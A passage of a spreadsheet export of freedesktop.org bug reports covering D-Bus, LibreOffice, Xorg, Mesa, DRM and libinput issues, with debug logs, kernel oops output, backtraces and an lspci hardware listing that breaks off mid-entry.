8: [dbus/dbus-file-win.c(134):_dbus_file_get_contents] file S:\xxxx\src\dbus-1-cmake-cross-x86-build\bus\session.conf hnd 00000088 opened
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 1000000000 for limit max_incoming_bytes
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 250000000 for limit max_incoming_unix_fds
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 1000000000 for limit max_outgoing_bytes
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 250000000 for limit max_outgoing_unix_fds
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 1000000000 for limit max_message_size
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 120000 for limit service_start_timeout
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 240000 for limit auth_timeout
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 150000 for limit pending_fd_timeout
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 100000 for limit max_completed_connections
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 10000 for limit max_incomplete_connections
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 100000 for limit max_connections_per_user
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 10000 for limit max_pending_service_starts
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 50000 for limit max_names_per_connection
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 50000 for limit max_match_rules_per_connectio
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 50000 for limit max_replies_per_connection
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 1000000000 for limit max_incoming_bytes
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 250000000 for limit max_incoming_unix_fds
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 1000000000 for limit max_outgoing_bytes
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 250000000 for limit max_outgoing_unix_fds
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 1000000000 for limit max_message_size
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 120000 for limit service_start_timeout
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 240000 for limit auth_timeout
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 150000 for limit pending_fd_timeout
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 100000 for limit max_completed_connections
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 10000 for limit max_incomplete_connections
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 100000 for limit max_connections_per_user
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 10000 for limit max_pending_service_starts
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 50000 for limit max_names_per_connection
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 50000 for limit max_match_rules_per_connection
8: [bus/config-parser.c(2647):bus_config_parser_content] Loaded value 50000 for limit max_replies_per_connection
8: [dbus/dbus-sysdeps-win.c(1029):_dbus_getsid] _dbus_getsid() got 'S-1-5-21-0-0-0-1000' and returns 1
[1] 8: [dbus/dbus-sysdeps-win.c(2893):_dbus_daemon_is_session_bus_address_published] scope 
8: [dbus/dbus-server.c(165):_dbus_server_init_base] Initialized server on address tcp:host=localhostport=51841family=ipv4guid=9c02e5e919e9b2c38a69520755fa030c
[2] 8: [dbus/dbus-sysdeps-win.c(2990):_dbus_daemon_publish_session_bus_address] published session bus address at DBusDaemonAddressInfo
8: [dbus/dbus-watch.c(318):_dbus_watch_list_set_functions] Adding a read watch on fd 136 using newly-set add watch function
8: [dbus/dbus-socket-set-poll.c(146):socket_set_poll_add] before adding fd 136 to 00241590 0 en/0 res/1 alloc
[3]8: [dbus/dbus-sysdeps-win.c(2893):_dbus_daemon_is_session_bus_address_published] scope 
8: [bus/bus.c(1099):bus_context_unref] Finalizing bus context 00241400
8: [dbus/dbus-watch.c(354):_dbus_watch_list_set_functions] Removing all pre-existing watches
8: [dbus/dbus-socket-set-poll.c(221):socket_set_poll_remove] after removing fd 136 from 00241590 0 en/0 res/1 alloc
8: [dbus/dbus-watch.c(686):dbus_watch_set_data] Setting watch fd 4294967295 data to data = 00000000 function = 00000000 from data = 00000000 function = 00000000
8: [dbus/dbus-sysdeps-win.c(510):_dbus_close_socket] _dbus_close_socket: socket=136 
8: [dbus/dbus-socket-set-poll.c(68):socket_set_poll_free] freed socket set 00241590
8: [dbus/dbus-dataslot.c(175):_dbus_data_slot_allocator_free] Freeing slot 0 on allocator 6DBE4338 total 1 allocated 1 used
Failed to start message bus: Address 'autolaunch' already used</t>
  </si>
  <si>
    <t>LIBREOFFICE-87786</t>
  </si>
  <si>
    <t>Showing Styles and formatting when side bar is completely closed doesn't show the whole sidebar</t>
  </si>
  <si>
    <t>The sidebar is completely closed (using the View menu). When pressing the Styles and formatting button on the toolbar in this state a somehow incomplete sidebar appears: there are none of the 4 buttons (e.g. Gallery Navigatorâ€¦).
Also it is similar when opening e.g. Gallery from the View menu.
When opening Navigator from the View menu it shows as a separate window.
I think it would be logical for all of the commands to show a complete sidebar with the respective section active.</t>
  </si>
  <si>
    <t>tomaskeb</t>
  </si>
  <si>
    <t>XORG-2383</t>
  </si>
  <si>
    <t>Rewrite of overlap removal code for bus resources code.</t>
  </si>
  <si>
    <t>The current code of RemoveOverlap() which determines overlaps of guessed
resources with probed ones is messy and hard to understand.
This implementation cleans up the code so that the different cases can be easily
identified as I was unable to determine if the old code did what it was expected
to do in all cases.
Furthermore this code now makes the assumption that the base address of a range
is much more reliable than its (guessed) size.</t>
  </si>
  <si>
    <t>DRI-21083</t>
  </si>
  <si>
    <t>Resizing glxgears windows kills GPU</t>
  </si>
  <si>
    <t>I'm running Fedora Rawhide -  I'm also using git builds for drm &amp; xf86-intel driver and vanilla kernel. With all combinations  I'm always getting deadlock of GPU while doing pretty simple operation like resizing glxgears windows.
I start glxgears - drag the bottom right corner and start to resize the window - I'm using Metacity Window manager with opaque resize. After few sec of resizing it deadlocks my  T61  - 4GB GMA965. and GPU has to be reset via setpci trick. 
Sometimes early after Xorg start I see this message in log:
[drm:i915_gem_object_bind_to_gtt] *ERROR* GTT full but LRU list empty
[drm:i915_gem_object_pin] *ERROR* Failure to bind: -12
[drm:i915_gem_evict_something] *ERROR* inactive empty 1 request empty 1 flushing empty 1
Looks like some counter are broken ?
When I run vanilla kernel - I could sometimes find this message log:
kernel BUG at drivers/gpu/drm/i915/i915_gem.c:1655!
invalid opcode: 0000 [#1] SMP 
last sysfs file: /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq
CPU 1 
Modules linked in: usbhid hid nls_iso8859_1 nls_cp1250 vfat fat mmc_block fuse ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_tcpudp iptable_filter ip_tables x_tables bridge stp llc rfcomm sco l2cap autofs4 sunrpc ipv6 binfmt_misc dm_mirror dm_region_hash dm_log dm_mod kvm_intel kvm i915 drm i2c_algo_bit uinput arc4 ecb cryptomgr aead snd_hda_codec_analog crypto_blkcipher crypto_hash snd_hda_intel snd_hda_codec snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss crypto_algapi sdhci_pci snd_mixer_oss i2c_i801 sr_mod rtc_cmos btusb bluetooth sdhci iwl3945 snd_pcm mac80211 lib80211 cdrom rtc_core i2c_core mmc_core rtc_lib cfg80211 thinkpad_acpi rfkill backlight evdev led_class snd_timer psmouse serio_raw iTCO_wdt iTCO_vendor_support nvram e1000e intel_agp snd soundcore snd_page_alloc battery ac button uhci_hcd ohci_hcd ehci_hcd usbcore [last unloaded: microcode]
Pid: 11755 comm: glxgears Not tainted 2.6.29 #49 6464CTO
RIP: 0010:[]  [] i915_gem_object_get_fence_reg+0x769/0x800 [i915]
RSP: 0018:ffff880130a67c98  EFLAGS: 00010202
RAX: ffff8801310ae840 RBX: ffff8801310ae9c0 RCX: 000000000000001e
RDX: ffff8800a78c1000 RSI: 0000000000000086 RDI: ffffffff8079d310
RBP: ffff880130a67cd8 R08: 000000000001564f R09: 0000000000000001
R10: 000000007fffffff R11: 0000000000000000 R12: ffff88013ac97000
R13: 0000000000000001 R14: ffff88013ac971b0 R15: ffff880139f57000
FS:  00007f15d8d346f0(0000) GS:ffff88013b803f80(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000000001e15008 CR3: 00000001308f5000 CR4: 00000000000026e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
Process glxgears (pid: 11755 threadinfo ffff880130a66000 task ffff8801314f0000)
Stack:
 ffff88012fea8480 ffff88012fea8300 ffffffff80703868 0000000000000000
 ffff88012fea8480 ffff88012fea8300 ffff880139f57000 ffff8801312f5860
 ffff880130a67d08 ffffffffa02e6c6a ffff8801310aea80 ffff88012fea8300
Call Trace:
 [] i915_gem_object_pin+0xda/0x180 [i915]
 [] i915_gem_execbuffer+0x209/0xe60 [i915]
 [] drm_ioctl+0x101/0x330 [drm]
 [] ? i915_gem_execbuffer+0x0/0xe60 [i915]
 [] vfs_ioctl+0x7c/0xa0
 [] do_vfs_ioctl+0x33b/0x5d0
 [] ? trace_hardirqs_off_thunk+0x3a/0x6c
 [] sys_ioctl+0x81/0xa0
 [] system_call_fastpath+0x16/0x1b
Code: 00 00 74 7c 3d d2 29 00 00 90 0f 84 98 00 00 00 8b 42 5c 83 ca ff c1 e8 09 0f bc c0 0f 44 c2 41 81 c8 00 10 00 00 e9 56 fe ff ff  0b eb fe 48 c7 c7 dd 97 2f a0 31 c0 e8 79 0c 24 e0 49 8b 06 
RIP  [] i915_gem_object_get_fence_reg+0x769/0x800 [i915]
 RSP 
I assume this problem is possibly fixed within linux-next which is used in for rawhide kernels? (i.e. I do not get this error with rawhide kernel)
Another weird thing which could be possibly related is that:
/proc/dri/0/gem_objects gives me different number of objects compared with the amount of drm objects visible by filecache module (external kernel patch that allows to see all objects located inside tmpfs) difference is in range of couple objects usually - i.e.  4780 != 4788 - but it is a difference - it looks like drm kernel module doesn't properly acount its objects?</t>
  </si>
  <si>
    <t>DBUS-11675</t>
  </si>
  <si>
    <t>Fails to build with non-gcc compilers</t>
  </si>
  <si>
    <t>The glib bindings fail to build on AIX-4.3.3 with the native compiler and on some non-c99 compilers.</t>
  </si>
  <si>
    <t>DBUS-3732</t>
  </si>
  <si>
    <t>Waldo Bastian bastian@svn.net 
Preferred account name: bastian</t>
  </si>
  <si>
    <t>MESA-35178</t>
  </si>
  <si>
    <t>SIGSEGV in brw_draw_init at brw_draw.c:471 with --enable-shared-dricore</t>
  </si>
  <si>
    <t>Program received signal SIGSEGV Segmentation fault.
    0x011ce9be in brw_draw_init (brw=0x80bf120) at brw_draw.c:471
    471 vbo-&gt;draw_prims = brw_draw_prims
    (gdb) bt
    #0 0x011ce9be in brw_draw_init (brw=0x80bf120) at brw_draw.c:471
    #1 0x011cb5fb in brwCreateContext (api=0 mesaVis=0x80bbb20 driContextPriv=0x80bbca8 sharedContextPrivate=0x0) at brw_context.c:221
    #2 0x011b44b5 in intelCreateContext (api=API_OPENGL mesaVis=0x80bbb20 driContextPriv=0x80bbca8 sharedContextPrivate=0x0) at intel_screen.c:461
    #3 0x0119e3c3 in dri2CreateNewContextForAPI (screen=0x80b97f8 api=0 config=0x80bbb20 shared=0x0 data=0x8077638) at ../common/dri_util.c:682
    #4 0x0119e41e in dri2CreateNewContext (screen=0x80b97f8 config=0x80bbb20 shared=0x0 data=0x8077638) at ../common/dri_util.c:696
    #5 0x005f79b6 in dri2_create_context (base=0x80775b8 config_base=0x80bc648 shareList=0x0 renderType=32788) at dri2_glx.c:204
    #6 0x005cfe9a in CreateContext (dpy=0x805ca18 generic_id= config=0x80bc648 shareList_user=0x0 allowDirect=1 code=24 renderType=32788
    screen=0) at glxcmds.c:233
    #7 0x005d0151 in glXCreateNewContext (dpy=0x805ca18 fbconfig=0x80bc648 renderType=32788 shareList=0x0 allowDirect=1) at glxcmds.c:1521
    #8 0x004951fe in clutter_backend_glx_create_context (backend=0x8055850 error=0xbfffe4dc) at ./glx/clutter-backend-glx.c:585
    #9 0x004b6323 in _clutter_backend_create_context (backend=0x8055850 error=0xbfffe4dc) at ./clutter-backend.c:410
    #10 0x004d2cb8 in _clutter_feature_init (error=0xbfffe4dc) at ./clutter-feature.c:107
    #11 0x004dfcfb in clutter_init_real (error=0xbfffe4dc) at ./clutter-main.c:1501
    #12 0x004e13b0 in clutter_init (argc=0x0 argv=0x0) at ./clutter-main.c:2008
    #13 0x001e303a in meta_clutter_init () at core/main.c:312
    #14 meta_init () at core/main.c:460
    #15 0x08049e48 in main (argc=1 argv=0xbfffe874) at main.c:425
git blames:
ef58598c1cf2ac689f67c75b2f477f2c404fce98 is the first bad commit
commit ef58598c1cf2ac689f67c75b2f477f2c404fce98
Author: Marek OlÅ¡Ã¡k 
Date:   Mon Mar 7 19:34:34 2011 +0100
    vbo: mark vertex arrays as dirty when re-binding
    This fixes:
    https://bugs.freedesktop.org/show_bug.cgi?id=34378
:040000 040000 86f7e2363cb0c1fc7a146cc36fde9333d0f4bcd1 ca575588faeb8fe79c3d768ff28a7a808a64afac M	src</t>
  </si>
  <si>
    <t>WAYLAND-99064</t>
  </si>
  <si>
    <t>Pinch recognized but Swipe</t>
  </si>
  <si>
    <t>I am running Antergos linux ( based on Arch ) everything updated.
The issue:
Sometime I do a swipe with 3 or 4 finger but a Pinch is recognized here some example using `libinput-debug-events` 
 event8 	GESTURE_PINCH_UPDATE  +4.63s	3 10.01/-58.61 (13.44/-78.74 unaccelerated)  1.03 @  0.35
 event8 	GESTURE_PINCH_UPDATE  +4.66s	3  9.20/-129.06 (11.52/-161.70 unaccelerated)  1.04 @  0.19
 event8 	GESTURE_PINCH_UPDATE  +4.68s	3  9.22/-152.98 (11.52/-191.23 unaccelerated)  1.04 @  1.51
 event8 	GESTURE_PINCH_UPDATE  +4.71s	3  4.61/-128.23 ( 5.76/-160.29 unaccelerated)  1.03 @  2.82
 event8 	GESTURE_PINCH_UPDATE  +4.73s	3  3.07/-77.62 ( 3.84/-97.02 unaccelerated)  1.03 @  0.46
Content of /sys/class/dmi/id/modalias: 
dmi:bvnInsydeCorp.:bvrA05:bd08/11/2016:svnTimi:pnTM1613:pvrA05:rvnTimi:rnTM1613:rvrA05:cvnTimi:ct10:cvrA05:
My Device as per `libinput-list-devices` output:
Device:           SynPS/2 Synaptics TouchPad
Kernel:           /dev/input/event8
Group:            6
Seat:             seat0 default
Size:             106.73x63.39mm
Capabilities:     pointer 
Tap-to-click:     disabled
Tap-and-drag:     enabled
Tap drag lock:    disabled
Left-handed:      disabled
Nat.scrolling:    disabled
Middle emulation: disabled
Calibration:      n/a
Scroll methods:   *two-finger edge 
Click methods:    *button-areas clickfinger 
Disable-w-typing: enabled
Accel profiles:   none
Rotation:         n/a
Is there anything I can do to calibrate the swipe/pinch tracking ?</t>
  </si>
  <si>
    <t>postadelmaga</t>
  </si>
  <si>
    <t>DRI-46274</t>
  </si>
  <si>
    <t>Reading from /sys/kernel/debug/dri/0/radeon_ring_cp* cause null-pointer dereference</t>
  </si>
  <si>
    <t>Using evergreen(cedar) hardware reading from /sys/kernel/debug/dri/0/radeon_ring_cp[12] cause null-pointer dereference with latest linus git(3.3-rc4).</t>
  </si>
  <si>
    <t>thomas.lindroth</t>
  </si>
  <si>
    <t>LIBREOFFICE-39608</t>
  </si>
  <si>
    <t>FILEOPEN particular .ppt causes CRASH</t>
  </si>
  <si>
    <t>Created attachment 49633
File saved in LO 3.4.2 RC3
I have MS Power Point document when i open in LO3.4.2 RC3 and save is OK. I'm closing the LO 3.4.2 RC3. When I try open the documentLO crash.
Next I openned *.ppt in LO 3.3.3 and I save it then I can open this document in LO3.4.2 RC3.</t>
  </si>
  <si>
    <t>gamma3</t>
  </si>
  <si>
    <t>MESA-108065</t>
  </si>
  <si>
    <t>Launching SteamVR results in nir_deref_instr_remove_if_unused assert</t>
  </si>
  <si>
    <t>When launching SteamVR the vrcompositor process hits the following assert:
vrcompositor: ../src/compiler/nir/nir_deref.c:95: nir_deref_instr_remove_if_unused: Assertion `d-&gt;dest.is_ssa' failed.
This regression started with the change:
864c78 nir/opt_if: Re-materialize derefs in use blocks before peeling loops
https://gitlab.freedesktop.org/mesa/mesa/commit/864c780566b8782c4fc69b4337db768223717bd8</t>
  </si>
  <si>
    <t>andresx7</t>
  </si>
  <si>
    <t>XORG-20794</t>
  </si>
  <si>
    <t>ASUS m3a78-em HD3200 IGP segfault on gdm starts</t>
  </si>
  <si>
    <t>Created attachment 24128
backtrace of xorg
We have this problem with an hd3200 amd ati IGP
on X start it's segfault with info of backtrace you find in attach.
i'm using an asus m3a78-em with HD3200/RS780 chipset
this is my lspci:
00:00.0 Host bridge: Advanced Micro Devices [AMD] RS780 Host Bridge
	Subsystem: ASUSTeK Computer Inc. Device 82f1
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Capabilities: 
00:01.0 PCI bridge: ASUSTeK Computer Inc. Device 9602 (prog-if 00 [Normal decode])
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64
	Bus: primary=00 secondary=01 subordinate=01 sec-latency=64
	I/O behind bridge: 0000c000-0000cfff
	Memory behind bridge: fb900000-fbafffff
	Prefetchable memory behind bridge: 00000000d0000000-00000000dfffffff
	Secondary status: 66MHz+ FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR-
	BridgeCtl: Parity- SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B-
		PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn-
	Capabilities: 
00:05.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 1) (prog-if 00 [Normal decode])
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Bus: primary=00 secondary=02 subordinate=02 sec-latency=0
	Memory behind bridge: fbb00000-fbbfffff
	Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR-
	BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B-
		PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn-
	Capabilities: 
	Kernel driver in use: pcieport-driver
00:06.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 2) (prog-if 00 [Normal decode])
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0 Cache Line Size: 64 bytes
	Bus: primary=00 secondary=03 subordinate=03 sec-latency=0
	I/O behind bridge: 0000d000-0000dfff
	Memory behind bridge: fbc00000-fbcfffff
	Prefetchable memory behind bridge: 00000000faf00000-00000000faffffff
	Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR-
	BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B-
		PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn-
	Capabilities: 
	Kernel driver in use: pcieport-driver
00:11.0 SATA controller: ATI Technologies Inc SB700/SB800 SATA Controller [AHCI mode] (prog-if 01 [AHCI 1.0])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 22
	Region 0: I/O ports at b000 [size=8]
	Region 1: I/O ports at a000 [size=4]
	Region 2: I/O ports at 9000 [size=8]
	Region 3: I/O ports at 8000 [size=4]
	Region 4: I/O ports at 7000 [size=16]
	Region 5: Memory at fb8ff800 (32-bit non-prefetchable) [size=1K]
	Capabilities: 
	Kernel driver in use: ahci
00:12.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller (prog-if 10 [OHCI])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 16
	Region 0: Memory at fb8fe000 (32-bit non-prefetchable) [size=4K]
	Kernel driver in use: ohci_hcd
00:12.1 USB Controller: ATI Technologies Inc SB700 USB OHCI1 Controller (prog-if 10 [OHCI])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 16
	Region 0: Memory at fb8fd000 (32-bit non-prefetchable) [size=4K]
	Kernel driver in use: ohci_hcd
00:12.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller (prog-if 20 [EHCI])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin B routed to IRQ 17
	Region 0: Memory at fb8ff000 (32-bit non-prefetchable) [size=256]
	Capabilities: 
	Kernel driver in use: ehci_hcd
00:13.0 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI0 Controller (prog-if 10 [OHCI])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 18
	Region 0: Memory at fb8fc000 (32-bit non-prefetchable) [size=4K]
	Kernel driver in use: ohci_hcd
00:13.1 USB Controller: ATI Technologies Inc SB700 USB OHCI1 Controller (prog-if 10 [OHCI])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin A routed to IRQ 18
	Region 0: Memory at fb8fb000 (32-bit non-prefetchable) [size=4K]
	Kernel driver in use: ohci_hcd
00:13.2 USB Controller: ATI Technologies Inc SB700/SB800 USB EHCI Controller (prog-if 20 [EHCI])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin B routed to IRQ 19
	Region 0: Memory at fb8fa800 (32-bit non-prefetchable) [size=256]
	Capabilities: 
	Kernel driver in use: ehci_hcd
00:14.0 SMBus: ATI Technologies Inc SBx00 SMBus Controller (rev 3a)
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
	Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Capabilities: 
	Kernel driver in use: piix4_smbus
00:14.1 IDE interface: ATI Technologies Inc SB700/SB800 IDE Controller (prog-if 8a [Master SecP PriP])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64
	Interrupt: pin A routed to IRQ 16
	Region 0: I/O ports at 01f0 [size=8]
	Region 1: I/O ports at 03f4 [size=1]
	Region 2: I/O ports at 0170 [size=8]
	Region 3: I/O ports at 0374 [size=1]
	Region 4: I/O ports at ff00 [size=16]
	Capabilities: 
	Kernel driver in use: ATIIXP_IDE
00:14.2 Audio device: ATI Technologies Inc SBx00 Azalia (Intel HDA)
	Subsystem: ASUSTeK Computer Inc. Device 82fe
	Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin ? routed to IRQ 16
	Region 0: Memory at fb8f4000 (64-bit non-prefetchable) [size=16K]
	Capabilities: 
	Kernel driver in use: HDA Intel
00:14.3 ISA bridge: ATI Technologies Inc SB700/SB800 LPC host controller
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
00:14.4 PCI bridge: ATI Technologies Inc SBx00 PCI to PCI Bridge (prog-if 01 [Subtractive decode])
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64
	Bus: primary=00 secondary=04 subordinate=04 sec-latency=64
	I/O behind bridge: 0000e000-0000efff
	Memory behind bridge: fbd00000-fbffffff
	Prefetchable memory behind bridge: f0000000-f00fffff
	Secondary status: 66MHz- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &lt;SERR- &lt;PERR-
	BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B-
		PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn-
00:14.5 USB Controller: ATI Technologies Inc SB700/SB800 USB OHCI2 Controller (prog-if 10 [OHCI])
	Subsystem: ASUSTeK Computer Inc. Device 82ef
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx-
	Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 64 Cache Line Size: 64 bytes
	Interrupt: pin C routed to IRQ 18
	Region 0: Memory at fb8f9000 (32-bit non-prefetchable) [size=4K]
	Kernel driver in use: ohci_hcd
00:18.0 Host bridge: Advanced Micro Devices [AMD] Family 10h [Opteron Athlon64 Sempron] HyperTransport Configuration
	Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Capabilities: 
00:18.1 Host bridge: Advanced Micro Devices [AMD] Family 10h [Opteron Athlon64 Sempron] Address Map
	Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx-
	Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
00:18.2 Host bridge: Advanced Micro Devices [AMD] Family 10h [Opteron Athlon64 Sempron] DRAM Controller
